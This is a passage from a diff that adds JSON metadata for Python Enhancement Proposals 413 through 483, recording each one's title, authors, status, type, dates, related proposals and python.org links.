+ "post_history": "24-Feb-2012, 25-Feb-2012", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0413/" + }, + "414": { + "number": 414, + "title": "Explicit Unicode Literal for Python 3.3", + "authors": "Armin Ronacher, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2012", + "python_version": "3.3", + "post_history": "28-Feb-2012, 04-Mar-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-February/116995.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0414/" + }, + "415": { + "number": 415, + "title": "Implement context suppression with exception attributes", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2012", + "python_version": "3.3", + "post_history": "26-Feb-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119467.html", + "requires": null, + "replaces": "409", + "superseded_by": null, + "url": "https://peps.python.org/pep-0415/" + }, + "416": { + "number": 416, + "title": "Add a frozendict builtin type", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Feb-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0416/" + }, + "417": { + "number": 417, + "title": "Including mock in the Standard Library", + "authors": "Michael Foord", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Mar-2012", + "python_version": "3.3", + "post_history": "12-Mar-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-March/117507.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0417/" + }, + "418": { + "number": 418, + "title": "Add monotonic time, performance counter, and process time functions", + "authors": "Cameron Simpson, Jim J. Jewett, Stephen J. Turnbull, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Mar-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0418/" + }, + "419": { + "number": 419, + "title": "Protecting cleanup statements from interruptions", + "authors": "Paul Colomiets", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "06-Apr-2012", + "python_version": "3.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0419/" + }, + "420": { + "number": 420, + "title": "Implicit Namespace Packages", + "authors": "Eric V. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Apr-2012", + "python_version": "3.3", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119651.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0420/" + }, + "421": { + "number": 421, + "title": "Adding sys.implementation", + "authors": "Eric Snow", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Apr-2012", + "python_version": "3.3", + "post_history": "26-Apr-2012", + "resolution": "https://mail.python.org/pipermail/python-dev/2012-May/119683.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0421/" + }, + "422": { + "number": 422, + "title": "Simpler customisation of class creation", + "authors": "Alyssa Coghlan, Daniel Urban", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2012", + "python_version": "3.5", + "post_history": "05-Jun-2012, 10-Feb-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0422/" + }, + "423": { + "number": 423, + "title": "Naming conventions and recipes related to packaging", + "authors": "Benoit Bryon", + "discussions_to": "distutils-sig@python.org", + "status": "Deferred", + "type": "Informational", + "topic": "packaging", + "created": "24-May-2012", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0423/" + }, + "424": { + "number": 424, + "title": "A method for exposing a length hint", + "authors": "Alex Gaynor", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Jul-2012", + "python_version": "3.4", + "post_history": "`15-Jul-2012 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0424/" + }, + "425": { + "number": 425, + "title": "Compatibility Tags for Built Distributions", + "authors": "Daniel Holth", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Jul-2012", + "python_version": "3.4", + "post_history": "08-Aug-2012, 18-Oct-2012, 15-Feb-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-February/124116.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0425/" + }, + "426": { + "number": 426, + "title": "Metadata for Python Software Packages 2.0", + "authors": "Alyssa Coghlan, Daniel Holth, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Informational", + "topic": "packaging", + "created": "30-Aug-2012", + "python_version": null, + "post_history": "14-Nov-2012, 05-Feb-2013, 07-Feb-2013, 09-Feb-2013, 27-May-2013, 20-Jun-2013, 23-Jun-2013, 14-Jul-2013, 21-Dec-2013", + "resolution": null, + "requires": "440, 508, 518", + "replaces": "345", + "superseded_by": "566", + "url": "https://peps.python.org/pep-0426/" + }, + "427": { + "number": 427, + "title": "The Wheel Binary Package Format 1.0", + "authors": "Daniel Holth", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Sep-2012", + "python_version": null, + "post_history": "18-Oct-2012, 15-Feb-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-February/124103.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0427/" + }, + "428": { + "number": 428, + "title": "The pathlib module -- object-oriented filesystem paths", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2012", + "python_version": "3.4", + "post_history": "`05-Oct-2012 `__", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130424.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0428/" + }, + "429": { + "number": 429, + "title": "Python 3.4 Release Schedule", + "authors": "Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "17-Oct-2012", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0429/" + }, + "430": { + "number": 430, + "title": "Migrating to Python 3 as the default online documentation", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "27-Oct-2012", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0430/" + }, + "431": { + "number": 431, + "title": "Time zone support improvements", + "authors": "Lennart Regebro", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2012", + "python_version": null, + "post_history": "11-Dec-2012, 28-Dec-2012, 28-Jan-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "615", + "url": "https://peps.python.org/pep-0431/" + }, + "432": { + "number": 432, + "title": "Restructuring the CPython startup sequence", + "authors": "Alyssa Coghlan, Victor Stinner, Eric Snow", + "discussions_to": "capi-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "28-Dec-2012", + "python_version": null, + "post_history": "28-Dec-2012, 02-Jan-2013, 30-Mar-2019, 28-Jun-2020", + "resolution": null, + "requires": "587", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0432/" + }, + "433": { + "number": 433, + "title": "Easier suppression of file descriptor inheritance", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "10-Jan-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "446", + "url": "https://peps.python.org/pep-0433/" + }, + "434": { + "number": 434, + "title": "IDLE Enhancement Exception for All Branches", + "authors": "Todd Rovito, Terry Reedy", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "16-Feb-2013", + "python_version": null, + "post_history": "16-Feb-2013, 03-Mar-2013, 21-Mar-2013, 30-Mar-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-March/125003.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0434/" + }, + "435": { + "number": 435, + "title": "Adding an Enum type to the Python standard library", + "authors": "Barry Warsaw, Eli Bendersky, Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Feb-2013", + "python_version": "3.4", + "post_history": "23-Feb-2013, 02-May-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126112.html", + "requires": null, + "replaces": "354", + "superseded_by": null, + "url": "https://peps.python.org/pep-0435/" + }, + "436": { + "number": 436, + "title": "The Argument Clinic DSL", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0436/" + }, + "437": { + "number": 437, + "title": "A DSL for specifying signatures, annotations and argument converters", + "authors": "Stefan Krah", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2013", + "python_version": "3.4", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126117.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0437/" + }, + "438": { + "number": 438, + "title": "Transitioning to release-file hosting on PyPI", + "authors": "Holger Krekel, Carl Meyer", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Process", + "topic": "packaging", + "created": "15-Mar-2013", + "python_version": null, + "post_history": "19-May-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-May/020773.html", + "requires": null, + "replaces": null, + "superseded_by": "470", + "url": "https://peps.python.org/pep-0438/" + }, + "439": { + "number": 439, + "title": "Inclusion of implicit pip bootstrap in Python installation", + "authors": "Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2013", + "python_version": "3.4", + "post_history": "19-Mar-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-August/022527.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0439/" + }, + "440": { + "number": 440, + "title": "Version Identification and Dependency Specification", + "authors": "Alyssa Coghlan, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2013", + "python_version": null, + "post_history": "30-Mar-2013, 27-May-2013, 20-Jun-2013, 21-Dec-2013, 28-Jan-2014, 08-Aug-2014, 22-Aug-2014", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2014-August/024673.html", + "requires": null, + "replaces": "386", + "superseded_by": null, + "url": "https://peps.python.org/pep-0440/" + }, + "441": { + "number": 441, + "title": "Improving Python ZIP Application Support", + "authors": "Daniel Holth, Paul Moore", + "discussions_to": "https://mail.python.org/pipermail/python-dev/2015-February/138277.html", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2013", + "python_version": "3.5", + "post_history": "30-Mar-2013, 01-Apr-2013, 16-Feb-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138578.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0441/" + }, + "442": { + "number": 442, + "title": "Safe object finalization", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-May-2013", + "python_version": "3.4", + "post_history": "18-May-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-June/126746.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0442/" + }, + "443": { + "number": 443, + "title": "Single-dispatch generic functions", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-May-2013", + "python_version": "3.4", + "post_history": "22-May-2013, 25-May-2013, 31-May-2013", + "resolution": null, + "requires": null, + "replaces": "245, 246, 3124", + "superseded_by": null, + "url": "https://peps.python.org/pep-0443/" + }, + "444": { + "number": 444, + "title": "Python Web3 Interface", + "authors": "Chris McDonough, Armin Ronacher", + "discussions_to": "web-sig@python.org", + "status": "Deferred", + "type": "Informational", + "topic": "", + "created": "19-Jul-2010", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0444/" + }, + "445": { + "number": 445, + "title": "Add new APIs to customize Python memory allocators", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jun-2013", + "python_version": "3.4", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-July/127222.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0445/" + }, + "446": { + "number": 446, + "title": "Make newly created file descriptors non-inheritable", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Aug-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "433", + "superseded_by": null, + "url": "https://peps.python.org/pep-0446/" + }, + "447": { + "number": 447, + "title": "Add __getdescriptor__ method to metaclass", + "authors": "Ronald Oussoren", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "12-Jun-2013", + "python_version": null, + "post_history": "02-Jul-2013, 15-Jul-2013, 29-Jul-2013, 22-Jul-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0447/" + }, + "448": { + "number": 448, + "title": "Additional Unpacking Generalizations", + "authors": "Joshua Landau", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jun-2013", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0448/" + }, + "449": { + "number": 449, + "title": "Removal of the PyPI Mirror Auto Discovery and Naming Scheme", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "04-Aug-2013", + "python_version": null, + "post_history": "04-Aug-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-August/022518.html", + "requires": null, + "replaces": "381", + "superseded_by": null, + "url": "https://peps.python.org/pep-0449/" + }, + "450": { + "number": 450, + "title": "Adding A Statistics Module To The Standard Library", + "authors": "Steven D'Aprano", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Aug-2013", + "python_version": "3.4", + "post_history": "13-Sep-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0450/" + }, + "451": { + "number": 451, + "title": "A ModuleSpec Type for the Import System", + "authors": "Eric Snow", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2013", + "python_version": "3.4", + "post_history": "08-Aug-2013, 28-Aug-2013, 18-Sep-2013, 24-Sep-2013, 04-Oct-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130104.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0451/" + }, + "452": { + "number": 452, + "title": "API for Cryptographic Hash Functions v2.0", + "authors": "A.M. Kuchling, Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "15-Aug-2013", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "247", + "superseded_by": null, + "url": "https://peps.python.org/pep-0452/" + }, + "453": { + "number": 453, + "title": "Explicit bootstrapping of pip in Python installations", + "authors": "Donald Stufft, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Aug-2013", + "python_version": null, + "post_history": "30-Aug-2013, 15-Sep-2013, 18-Sep-2013, 19-Sep-2013, 23-Sep-2013, 29-Sep-2013, 13-Oct-2013, 20-Oct-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-October/129810.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0453/" + }, + "454": { + "number": 454, + "title": "Add a new tracemalloc module to trace Python memory allocations", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2013", + "python_version": "3.4", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130491.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0454/" + }, + "455": { + "number": 455, + "title": "Adding a key-transforming dictionary to collections", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2013", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0455/" + }, + "456": { + "number": 456, + "title": "Secure and interchangeable hash algorithm", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Sep-2013", + "python_version": "3.4", + "post_history": "06-Oct-2013, 14-Nov-2013, 20-Nov-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130400.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0456/" + }, + "457": { + "number": 457, + "title": "Notation For Positional-Only Parameters", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "08-Oct-2013", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0457/" + }, + "458": { + "number": 458, + "title": "Secure PyPI downloads with signed repository metadata", + "authors": "Trishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos", + "discussions_to": "https://discuss.python.org/t/pep-458-secure-pypi-downloads-with-package-signing/2648", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Sep-2013", + "python_version": null, + "post_history": "06-Jan-2019, 13-Nov-2019", + "resolution": "https://discuss.python.org/t/pep-458-secure-pypi-downloads-with-package-signing/2648/115", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0458/" + }, + "459": { + "number": 459, + "title": "Standard Metadata Extensions for Python Software Packages", + "authors": "Alyssa Coghlan", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Nov-2013", + "python_version": null, + "post_history": "21-Dec-2013", + "resolution": null, + "requires": "426", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0459/" + }, + "460": { + "number": 460, + "title": "Add binary interpolation and formatting", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-Jan-2014", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0460/" + }, + "461": { + "number": 461, + "title": "Adding % formatting to bytes and bytearray", + "authors": "Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jan-2014", + "python_version": "3.5", + "post_history": "14-Jan-2014, 15-Jan-2014, 17-Jan-2014, 22-Feb-2014, 25-Mar-2014, 27-Mar-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-March/133621.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0461/" + }, + "462": { + "number": 462, + "title": "Core development workflow automation for CPython", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "23-Jan-2014", + "python_version": null, + "post_history": "25-Jan-2014, 27-Jan-2014, 01-Feb-2015", + "resolution": null, + "requires": "474", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0462/" + }, + "463": { + "number": 463, + "title": "Exception-catching expressions", + "authors": "Chris Angelico", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2014", + "python_version": "3.5", + "post_history": "20-Feb-2014, 16-Feb-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-March/133118.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0463/" + }, + "464": { + "number": 464, + "title": "Removal of the PyPI Mirror Authenticity API", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "02-Mar-2014", + "python_version": null, + "post_history": "04-Mar-2014", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2014-March/024027.html", + "requires": null, + "replaces": "381", + "superseded_by": null, + "url": "https://peps.python.org/pep-0464/" + }, + "465": { + "number": 465, + "title": "A dedicated infix operator for matrix multiplication", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Feb-2014", + "python_version": "3.5", + "post_history": "13-Mar-2014", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/D63NDWHPF7OC2Z455MPHOW6QLLSNQUJ5/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0465/" + }, + "466": { + "number": 466, + "title": "Network Security Enhancements for Python 2.7.x", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Mar-2014", + "python_version": "2.7.9", + "post_history": "23-Mar-2014, 24-Mar-2014, 25-Mar-2014, 26-Mar-2014, 16-Apr-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-April/134163.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0466/" + }, + "467": { + "number": 467, + "title": "Minor API improvements for binary sequences", + "authors": "Alyssa Coghlan, Ethan Furman", + "discussions_to": "https://discuss.python.org/t/42001", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2014", + "python_version": "3.13", + "post_history": "30-Mar-2014, 15-Aug-2014, 16-Aug-2014, 07-Jun-2016, 01-Sep-2016, 13-Apr-2021, 03-Nov-2021, 27-Dec-2023", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0467/" + }, + "468": { + "number": 468, + "title": "Preserving the order of \\*\\*kwargs in a function.", + "authors": "Eric Snow", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Apr-2014", + "python_version": "3.6", + "post_history": "05-Apr-2014, 08-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146329.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0468/" + }, + "469": { + "number": 469, + "title": "Migration of dict iteration code to Python 3", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2014", + "python_version": "3.5", + "post_history": "18-Apr-2014, 21-Apr-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0469/" + }, + "470": { + "number": 470, + "title": "Removing External Hosting Support on PyPI", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "12-May-2014", + "python_version": null, + "post_history": "14-May-2014, 05-Jun-2014, 03-Oct-2014, 13-Oct-2014, 26-Aug-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-September/026789.html", + "requires": null, + "replaces": "438", + "superseded_by": null, + "url": "https://peps.python.org/pep-0470/" + }, + "471": { + "number": 471, + "title": "os.scandir() function -- a better and faster directory iterator", + "authors": "Ben Hoyt", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-May-2014", + "python_version": "3.5", + "post_history": "27-Jun-2014, 08-Jul-2014, 14-Jul-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0471/" + }, + "472": { + "number": 472, + "title": "Support for indexing with keyword arguments", + "authors": "Stefano Borini, Joseph Martinot-Lagarde", + "discussions_to": "python-ideas@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Jun-2014", + "python_version": "3.6", + "post_history": "02-Jul-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156693.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0472/" + }, + "473": { + "number": 473, + "title": "Adding structured data to built-in exceptions", + "authors": "Sebastian Kreft", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Mar-2014", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156692.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0473/" + }, + "474": { + "number": 474, + "title": "Creating forge.python.org", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "19-Jul-2014", + "python_version": null, + "post_history": "19-Jul-2014, 08-Jan-2015, 01-Feb-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0474/" + }, + "475": { + "number": 475, + "title": "Retry system calls failing with EINTR", + "authors": "Charles-Fran\u00e7ois Natali, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jul-2014", + "python_version": "3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138018.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0475/" + }, + "476": { + "number": 476, + "title": "Enabling certificate verification by default for stdlib http clients", + "authors": "Alex Gaynor", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Aug-2014", + "python_version": "2.7.9, 3.4.3, 3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2014-October/136676.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0476/" + }, + "477": { + "number": 477, + "title": "Backport ensurepip (PEP 453) to Python 2.7", + "authors": "Donald Stufft, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2014", + "python_version": null, + "post_history": "01-Sep-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-September/136238.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0477/" + }, + "478": { + "number": 478, + "title": "Python 3.5 Release Schedule", + "authors": "Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "22-Sep-2014", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0478/" + }, + "479": { + "number": 479, + "title": "Change StopIteration handling inside generators", + "authors": "Chris Angelico, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2014", + "python_version": "3.5", + "post_history": "15-Nov-2014, 19-Nov-2014, 05-Dec-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0479/" + }, + "480": { + "number": 480, + "title": "Surviving a Compromise of PyPI: End-to-end signing of packages", + "authors": "Trishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore", + "discussions_to": "https://discuss.python.org/t/5666", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Oct-2014", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": "458", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0480/" + }, + "481": { + "number": 481, + "title": "Migrate CPython to Git, Github, and Phabricator", + "authors": "Donald Stufft", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "29-Nov-2014", + "python_version": null, + "post_history": "29-Nov-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0481/" + }, + "482": { + "number": 482, + "title": "Literature Overview for Type Hints", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Informational", + "topic": "typing", + "created": "08-Jan-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0482/" + }, + "483": { + "number": 483, + "title": "The Theory of Type Hints", + "authors": "Guido van Rossum, Ivan Levkivskyi", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Informational", + "topic": "typing", + 